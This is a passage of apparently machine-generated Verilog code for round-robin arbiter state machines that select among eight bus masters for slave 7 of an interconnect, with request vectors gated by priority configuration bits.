                        s7_msel_arb0_next_state = s7_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s7_msel_arb0_req[6] ) 
                        begin
                            s7_msel_arb0_next_state = s7_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s7_msel_arb0_req[7] ) 
                            begin
                                s7_msel_arb0_next_state = s7_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s7_msel_arb0_req[0] ) 
                                begin
                                    s7_msel_arb0_next_state = s7_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb0_req[1] ) 
                                    begin
                                        s7_msel_arb0_next_state = s7_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb0_req[2] ) 
                                        begin
                                            s7_msel_arb0_next_state = s7_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb0_grant4:
        begin
            if (  !( s7_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s7_msel_arb0_req[5] ) 
                begin
                    s7_msel_arb0_next_state = s7_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s7_msel_arb0_req[6] ) 
                    begin
                        s7_msel_arb0_next_state = s7_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s7_msel_arb0_req[7] ) 
                        begin
                            s7_msel_arb0_next_state = s7_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s7_msel_arb0_req[0] ) 
                            begin
                                s7_msel_arb0_next_state = s7_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s7_msel_arb0_req[1] ) 
                                begin
                                    s7_msel_arb0_next_state = s7_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb0_req[2] ) 
                                    begin
                                        s7_msel_arb0_next_state = s7_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb0_req[3] ) 
                                        begin
                                            s7_msel_arb0_next_state = s7_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb0_grant5:
        begin
            if (  !( s7_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s7_msel_arb0_req[6] ) 
                begin
                    s7_msel_arb0_next_state = s7_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s7_msel_arb0_req[7] ) 
                    begin
                        s7_msel_arb0_next_state = s7_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s7_msel_arb0_req[0] ) 
                        begin
                            s7_msel_arb0_next_state = s7_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s7_msel_arb0_req[1] ) 
                            begin
                                s7_msel_arb0_next_state = s7_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s7_msel_arb0_req[2] ) 
                                begin
                                    s7_msel_arb0_next_state = s7_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb0_req[3] ) 
                                    begin
                                        s7_msel_arb0_next_state = s7_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb0_req[4] ) 
                                        begin
                                            s7_msel_arb0_next_state = s7_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb0_grant6:
        begin
            if (  !( s7_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s7_msel_arb0_req[7] ) 
                begin
                    s7_msel_arb0_next_state = s7_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s7_msel_arb0_req[0] ) 
                    begin
                        s7_msel_arb0_next_state = s7_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s7_msel_arb0_req[1] ) 
                        begin
                            s7_msel_arb0_next_state = s7_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s7_msel_arb0_req[2] ) 
                            begin
                                s7_msel_arb0_next_state = s7_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s7_msel_arb0_req[3] ) 
                                begin
                                    s7_msel_arb0_next_state = s7_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb0_req[4] ) 
                                    begin
                                        s7_msel_arb0_next_state = s7_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb0_req[5] ) 
                                        begin
                                            s7_msel_arb0_next_state = s7_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb0_grant7:
        begin
            if (  !( s7_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s7_msel_arb0_req[0] ) 
                begin
                    s7_msel_arb0_next_state = s7_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s7_msel_arb0_req[1] ) 
                    begin
                        s7_msel_arb0_next_state = s7_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s7_msel_arb0_req[2] ) 
                        begin
                            s7_msel_arb0_next_state = s7_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s7_msel_arb0_req[3] ) 
                            begin
                                s7_msel_arb0_next_state = s7_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s7_msel_arb0_req[4] ) 
                                begin
                                    s7_msel_arb0_next_state = s7_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb0_req[5] ) 
                                    begin
                                        s7_msel_arb0_next_state = s7_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb0_req[6] ) 
                                        begin
                                            s7_msel_arb0_next_state = s7_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s7_msel_arb1_req = { ( s7_msel_req[7] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[15] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[14] ) ) } == 2'd1 ) ), ( s7_msel_req[6] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[13] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[12] ) ) } == 2'd1 ) ), ( s7_msel_req[5] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[11] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[10] ) ) } == 2'd1 ) ), ( s7_msel_req[4] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[9] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[8] ) ) } == 2'd1 ) ), ( s7_msel_req[3] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[7] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[6] ) ) } == 2'd1 ) ), ( s7_msel_req[2] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[5] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[4] ) ) } == 2'd1 ) ), ( s7_msel_req[1] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[3] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[2] ) ) } == 2'd1 ) ), ( s7_msel_req[0] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[1] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s7_msel_arb1_state <= s7_msel_arb1_grant0;
        end
        else
        begin 
            s7_msel_arb1_state <= s7_msel_arb1_next_state;
        end
    end
    always @ (  s7_msel_arb1_state or  { ( s7_msel_req[7] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[15] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[14] ) ) } == 2'd1 ) ), ( s7_msel_req[6] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[13] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[12] ) ) } == 2'd1 ) ), ( s7_msel_req[5] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[11] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[10] ) ) } == 2'd1 ) ), ( s7_msel_req[4] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[9] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[8] ) ) } == 2'd1 ) ), ( s7_msel_req[3] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[7] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[6] ) ) } == 2'd1 ) ), ( s7_msel_req[2] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[5] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[4] ) ) } == 2'd1 ) ), ( s7_msel_req[1] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[3] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[2] ) ) } == 2'd1 ) ), ( s7_msel_req[0] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[1] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s7_msel_arb1_next_state = s7_msel_arb1_state;
        case ( s7_msel_arb1_state ) 
        s7_msel_arb1_grant0:
        begin
            if (  !( s7_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s7_msel_arb1_req[1] ) 
                begin
                    s7_msel_arb1_next_state = s7_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s7_msel_arb1_req[2] ) 
                    begin
                        s7_msel_arb1_next_state = s7_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s7_msel_arb1_req[3] ) 
                        begin
                            s7_msel_arb1_next_state = s7_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s7_msel_arb1_req[4] ) 
                            begin
                                s7_msel_arb1_next_state = s7_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s7_msel_arb1_req[5] ) 
                                begin
                                    s7_msel_arb1_next_state = s7_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb1_req[6] ) 
                                    begin
                                        s7_msel_arb1_next_state = s7_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb1_req[7] ) 
                                        begin
                                            s7_msel_arb1_next_state = s7_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb1_grant1:
        begin
            if (  !( s7_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s7_msel_arb1_req[2] ) 
                begin
                    s7_msel_arb1_next_state = s7_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s7_msel_arb1_req[3] ) 
                    begin
                        s7_msel_arb1_next_state = s7_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s7_msel_arb1_req[4] ) 
                        begin
                            s7_msel_arb1_next_state = s7_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s7_msel_arb1_req[5] ) 
                            begin
                                s7_msel_arb1_next_state = s7_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s7_msel_arb1_req[6] ) 
                                begin
                                    s7_msel_arb1_next_state = s7_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb1_req[7] ) 
                                    begin
                                        s7_msel_arb1_next_state = s7_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb1_req[0] ) 
                                        begin
                                            s7_msel_arb1_next_state = s7_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb1_grant2:
        begin
            if (  !( s7_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s7_msel_arb1_req[3] ) 
                begin
                    s7_msel_arb1_next_state = s7_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s7_msel_arb1_req[4] ) 
                    begin
                        s7_msel_arb1_next_state = s7_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s7_msel_arb1_req[5] ) 
                        begin
                            s7_msel_arb1_next_state = s7_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s7_msel_arb1_req[6] ) 
                            begin
                                s7_msel_arb1_next_state = s7_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s7_msel_arb1_req[7] ) 
                                begin
                                    s7_msel_arb1_next_state = s7_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb1_req[0] ) 
                                    begin
                                        s7_msel_arb1_next_state = s7_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb1_req[1] ) 
                                        begin
                                            s7_msel_arb1_next_state = s7_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb1_grant3:
        begin
            if (  !( s7_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s7_msel_arb1_req[4] ) 
                begin
                    s7_msel_arb1_next_state = s7_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s7_msel_arb1_req[5] ) 
                    begin
                        s7_msel_arb1_next_state = s7_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s7_msel_arb1_req[6] ) 
                        begin
                            s7_msel_arb1_next_state = s7_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s7_msel_arb1_req[7] ) 
                            begin
                                s7_msel_arb1_next_state = s7_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s7_msel_arb1_req[0] ) 
                                begin
                                    s7_msel_arb1_next_state = s7_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb1_req[1] ) 
                                    begin
                                        s7_msel_arb1_next_state = s7_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb1_req[2] ) 
                                        begin
                                            s7_msel_arb1_next_state = s7_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb1_grant4:
        begin
            if (  !( s7_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s7_msel_arb1_req[5] ) 
                begin
                    s7_msel_arb1_next_state = s7_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s7_msel_arb1_req[6] ) 
                    begin
                        s7_msel_arb1_next_state = s7_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s7_msel_arb1_req[7] ) 
                        begin
                            s7_msel_arb1_next_state = s7_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s7_msel_arb1_req[0] ) 
                            begin
                                s7_msel_arb1_next_state = s7_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s7_msel_arb1_req[1] ) 
                                begin
                                    s7_msel_arb1_next_state = s7_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb1_req[2] ) 
                                    begin
                                        s7_msel_arb1_next_state = s7_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb1_req[3] ) 
                                        begin
                                            s7_msel_arb1_next_state = s7_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb1_grant5:
        begin
            if (  !( s7_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s7_msel_arb1_req[6] ) 
                begin
                    s7_msel_arb1_next_state = s7_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s7_msel_arb1_req[7] ) 
                    begin
                        s7_msel_arb1_next_state = s7_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s7_msel_arb1_req[0] ) 
                        begin
                            s7_msel_arb1_next_state = s7_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s7_msel_arb1_req[1] ) 
                            begin
                                s7_msel_arb1_next_state = s7_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s7_msel_arb1_req[2] ) 
                                begin
                                    s7_msel_arb1_next_state = s7_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb1_req[3] ) 
                                    begin
                                        s7_msel_arb1_next_state = s7_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb1_req[4] ) 
                                        begin
                                            s7_msel_arb1_next_state = s7_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb1_grant6:
        begin
            if (  !( s7_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s7_msel_arb1_req[7] ) 
                begin
                    s7_msel_arb1_next_state = s7_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s7_msel_arb1_req[0] ) 
                    begin
                        s7_msel_arb1_next_state = s7_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s7_msel_arb1_req[1] ) 
                        begin
                            s7_msel_arb1_next_state = s7_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s7_msel_arb1_req[2] ) 
                            begin
                                s7_msel_arb1_next_state = s7_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s7_msel_arb1_req[3] ) 
                                begin
                                    s7_msel_arb1_next_state = s7_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb1_req[4] ) 
                                    begin
                                        s7_msel_arb1_next_state = s7_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb1_req[5] ) 
                                        begin
                                            s7_msel_arb1_next_state = s7_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb1_grant7:
        begin
            if (  !( s7_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s7_msel_arb1_req[0] ) 
                begin
                    s7_msel_arb1_next_state = s7_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s7_msel_arb1_req[1] ) 
                    begin
                        s7_msel_arb1_next_state = s7_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s7_msel_arb1_req[2] ) 
                        begin
                            s7_msel_arb1_next_state = s7_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s7_msel_arb1_req[3] ) 
                            begin
                                s7_msel_arb1_next_state = s7_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s7_msel_arb1_req[4] ) 
                                begin
                                    s7_msel_arb1_next_state = s7_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb1_req[5] ) 
                                    begin
                                        s7_msel_arb1_next_state = s7_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb1_req[6] ) 
                                        begin
                                            s7_msel_arb1_next_state = s7_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s7_msel_arb2_req = { ( s7_msel_req[7] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[15] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[14] ) ) } == 2'd2 ) ), ( s7_msel_req[6] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[13] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[12] ) ) } == 2'd2 ) ), ( s7_msel_req[5] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[11] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[10] ) ) } == 2'd2 ) ), ( s7_msel_req[4] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[9] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[8] ) ) } == 2'd2 ) ), ( s7_msel_req[3] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[7] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[6] ) ) } == 2'd2 ) ), ( s7_msel_req[2] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[5] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[4] ) ) } == 2'd2 ) ), ( s7_msel_req[1] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[3] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[2] ) ) } == 2'd2 ) ), ( s7_msel_req[0] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[1] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s7_msel_arb2_state <= s7_msel_arb2_grant0;
        end
        else
        begin 
            s7_msel_arb2_state <= s7_msel_arb2_next_state;
        end
    end
    always @ (  s7_msel_arb2_state or  { ( s7_msel_req[7] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[15] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[14] ) ) } == 2'd2 ) ), ( s7_msel_req[6] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[13] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[12] ) ) } == 2'd2 ) ), ( s7_msel_req[5] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[11] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[10] ) ) } == 2'd2 ) ), ( s7_msel_req[4] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[9] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[8] ) ) } == 2'd2 ) ), ( s7_msel_req[3] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[7] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[6] ) ) } == 2'd2 ) ), ( s7_msel_req[2] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[5] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[4] ) ) } == 2'd2 ) ), ( s7_msel_req[1] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[3] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[2] ) ) } == 2'd2 ) ), ( s7_msel_req[0] & ( { ( ( ( s7_msel_pri_sel == 2'd2 ) ) ? ( rf_conf7[1] ) : ( 1'b0 ) ), ( ( ( s7_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf7[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s7_msel_arb2_next_state = s7_msel_arb2_state;
        case ( s7_msel_arb2_state ) 
        s7_msel_arb2_grant0:
        begin
            if (  !( s7_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s7_msel_arb2_req[1] ) 
                begin
                    s7_msel_arb2_next_state = s7_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s7_msel_arb2_req[2] ) 
                    begin
                        s7_msel_arb2_next_state = s7_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s7_msel_arb2_req[3] ) 
                        begin
                            s7_msel_arb2_next_state = s7_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s7_msel_arb2_req[4] ) 
                            begin
                                s7_msel_arb2_next_state = s7_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s7_msel_arb2_req[5] ) 
                                begin
                                    s7_msel_arb2_next_state = s7_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb2_req[6] ) 
                                    begin
                                        s7_msel_arb2_next_state = s7_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb2_req[7] ) 
                                        begin
                                            s7_msel_arb2_next_state = s7_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb2_grant1:
        begin
            if (  !( s7_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s7_msel_arb2_req[2] ) 
                begin
                    s7_msel_arb2_next_state = s7_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s7_msel_arb2_req[3] ) 
                    begin
                        s7_msel_arb2_next_state = s7_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s7_msel_arb2_req[4] ) 
                        begin
                            s7_msel_arb2_next_state = s7_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s7_msel_arb2_req[5] ) 
                            begin
                                s7_msel_arb2_next_state = s7_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s7_msel_arb2_req[6] ) 
                                begin
                                    s7_msel_arb2_next_state = s7_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb2_req[7] ) 
                                    begin
                                        s7_msel_arb2_next_state = s7_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb2_req[0] ) 
                                        begin
                                            s7_msel_arb2_next_state = s7_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb2_grant2:
        begin
            if (  !( s7_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s7_msel_arb2_req[3] ) 
                begin
                    s7_msel_arb2_next_state = s7_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s7_msel_arb2_req[4] ) 
                    begin
                        s7_msel_arb2_next_state = s7_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s7_msel_arb2_req[5] ) 
                        begin
                            s7_msel_arb2_next_state = s7_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s7_msel_arb2_req[6] ) 
                            begin
                                s7_msel_arb2_next_state = s7_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s7_msel_arb2_req[7] ) 
                                begin
                                    s7_msel_arb2_next_state = s7_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb2_req[0] ) 
                                    begin
                                        s7_msel_arb2_next_state = s7_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb2_req[1] ) 
                                        begin
                                            s7_msel_arb2_next_state = s7_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb2_grant3:
        begin
            if (  !( s7_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s7_msel_arb2_req[4] ) 
                begin
                    s7_msel_arb2_next_state = s7_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s7_msel_arb2_req[5] ) 
                    begin
                        s7_msel_arb2_next_state = s7_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s7_msel_arb2_req[6] ) 
                        begin
                            s7_msel_arb2_next_state = s7_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s7_msel_arb2_req[7] ) 
                            begin
                                s7_msel_arb2_next_state = s7_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s7_msel_arb2_req[0] ) 
                                begin
                                    s7_msel_arb2_next_state = s7_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s7_msel_arb2_req[1] ) 
                                    begin
                                        s7_msel_arb2_next_state = s7_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s7_msel_arb2_req[2] ) 
                                        begin
                                            s7_msel_arb2_next_state = s7_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s7_msel_arb2_grant4:
        begin
            if (  !( s7_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s7_msel_arb2_req[5] ) 
                begin
                    s7_msel_arb2_next_state = s7_msel_arb2_grant5;
                end
                else
                begin 
